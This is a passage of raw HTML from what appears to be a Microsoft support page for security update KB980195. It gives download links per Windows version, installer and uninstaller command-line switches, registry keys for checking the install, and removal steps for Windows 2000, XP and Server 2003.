href=\"http://download.microsoft.com/download/8/9/5/8957dea8-4f4e-44ec-adb5-98a523cabbf1/windows6.1-kb980195-x64.msu\" id=\"kb-link-11\" target=\"_self\">Download the Windows6.1-KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Vista, for Windows Vista Service Pack 1, and for Windows Vista Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/d/3/2d37d4b9-276a-46d1-95ba-e0ff63c180a1/windows6.0-kb980195-x86.msu\" id=\"kb-link-12\" target=\"_self\">Download the Windows6.0-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Vista x64 Edition, for Windows Vista x64 Edition Service Pack 1, and for Windows Vista x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/c/8/2c8f9707-9241-495d-8830-e2139bc6384b/windows6.0-kb980195-x64.msu\" id=\"kb-link-13\" target=\"_self\">Download the Windows6.0-KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for 32-bit systems and for Windows Server 2008 for 32-bit systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/b/d/9/bd96cceb-e37c-4f75-82d8-83e89f3b940d/windows6.0-kb980195-x86.msu\" id=\"kb-link-14\" target=\"_self\">Download the Windows6.0-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for Itanium-based systems and for Windows Server 2008 for Itanium-based systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/b/c/5/bc50034d-53ac-4fe6-9159-f49c71757fb5/windows6.0-kb980195-ia64.msu\" id=\"kb-link-15\" target=\"_self\">Download the Windows6.0-KB980195-ia64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for x64-based systems and for Windows Server 2008 for x64-based systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/b/b/0bbbee8a-b4f1-4ecc-8953-fb05422d827c/windows6.0-kb980195-x64.msu\" id=\"kb-link-16\" target=\"_self\">Download the KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows XP Service Pack 2 and for Windows XP Service Pack 3</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/7/a/07ab5bdc-10c5-4716-b6b4-cc85be71b8e9/windowsxp-kb980195-x86-enu.exe\" id=\"kb-link-17\" target=\"_self\">Download the WindowsXP-KB980195-x86-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows XP Professional x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/5/b/a/5baded09-3767-4c52-b485-2c2c3f922958/windowsserver2003.windowsxp-kb980195-x64-enu.exe\" id=\"kb-link-18\" target=\"_self\">Download the WindowsServer2003.WindowsXP-KB980195-x64-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/3/8/3/38325aa7-a5cb-40fc-9786-8ef743877d99/windowsserver2003-kb980195-x86-enu.exe\" id=\"kb-link-19\" target=\"_self\">Download the WindowsServer2003-KB980195-x86-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 with SP2 for Itanium-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/9/4/a/94a3fc29-3c52-4269-994b-8d8185ef8059/windowsserver2003-kb980195-ia64-enu.exe\" id=\"kb-link-20\" target=\"_self\">Download the WindowsServer2003-KB980195-ia64-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/5/d/05d9a3c8-fc4c-448f-8c46-e5e04ff19126/windowsserver2003.windowsxp-kb980195-x64-enu.exe\" id=\"kb-link-21\" target=\"_self\">Download the WindowsServer2003.WindowsXP-KB980195-x64-ENU.exe package now.</a></span><br/><br/><span>Release Date: June 8, 2010<br/><br/>For more information about how to download Microsoft support files, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/119591\" id=\"kb-link-23\">119591 </a> How to obtain Microsoft support files from online services</span></div><span>Microsoft scanned this file for viruses. Microsoft used the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to the file.</span><h3 class=\"sbody-h3\">Security update deployment</h3><h4 class=\"sbody-h4\">Windows 2000 (all versions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue may be included in a future update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Windows2000-KB980195-x86-ENU/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Windows2000-KB980195-x86-ENU/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows 2000\\SP5\\KB980195\\Filelist</strong></td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-24\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported security update installation switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the installation switches that are supported, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-25\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported Spuninst.exe switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys that are listed in the reference table in this section. These registry subkeys may not contain a complete list of files that are installed. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows XP (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/>Windowsxp-KB980195-x86-enu/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/>Windowsxp-KB980195-x86-enu/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">All supported versions of Windows XP and Windows XP Professional:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">All supported versions of Windows XP and Windows XP Professional:<br/>Use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP\\SP4\\KB980195\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP Version 2003\\SP3\\KB980195\\Filelist</strong></td></tr></tbody></table></div><span class=\"text-base\">Note</span> The security update for supported versions of Windows XP Professional x64 Edition is the same as the security update for supported versions of Windows Server 2003 x64 Edition.<br/><br/>\u00a0<h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-26\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/integrate:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Integrates the update into the Windows source files. These files are located by using the path that is specified in the switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the supported installation switches, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-27\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys listed in the reference table in this section. These registry subkeys may not contain a complete list of installed files. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows Server 2003 (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing with requiring user intervention</td><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2:<br/>Windowsserver2003-KB980195-x86-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems:<br/>Windowsserver2003-KB980195-ia64-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2:<br/>Windowsserver2003-KB980195-x86-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems:<br/>Windowsserver2003-KB980195-ia64-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">All supported Windows Server 2003 x86-based versions, x64-based versions, and Itanium-based versions of Windows Server 2003:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">This security update does not support Hotpatching. For more information about Hotpatching, see Microsoft Knowledge Base Article 897341.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">\u00a0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">All supported x86-based versions, x64-based versions, and Itanium-based versions of Windows Server 2003:<br/>Use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel, or use the Spuninst.exe utility that is located in the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">All supported versions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB980195\\Filelist</strong></td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-28\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the 